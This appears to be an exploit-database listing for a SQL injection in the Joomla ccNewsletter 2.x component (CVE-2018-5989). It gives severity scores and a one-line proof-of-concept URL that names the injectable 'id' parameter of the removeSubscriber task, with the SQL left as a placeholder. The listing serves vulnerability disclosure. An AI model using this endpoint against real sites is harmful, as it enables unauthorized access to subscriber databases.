Advertisement






Joomla ccNewsletter 2.x.x SQL Injection

CVE Category Price Severity
CVE-2018-5989 CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2018-02-17
CVSS EPSS EPSSP
CVSS:4.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H 0.53964 0.73102

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2018020204

Below is a copy:

Joomla ccNewsletter 2.x.x SQL Injection
# # # #
# Exploit Title: Joomla Component ccNewsletter 2.x.x 'id' - SQL Injection
# Dork: N/A
# Date: 16.02.2018
# Vendor Homepage: https://www.chillcreations.com/
# Software Link: https://extensions.joomla.org/extension/ccnewsletter/
# Version: 2.x Stable
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: CVE-2018-5989
# # # #
# Exploit Author: Ihsan Sencan
# # # #
# 
# POC:
# 
# 1)
# http://localhost/[PATH]/index.php?option=com_ccnewsletter&task=removeSubscriber&id=[SQL]
# 
# # # #

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum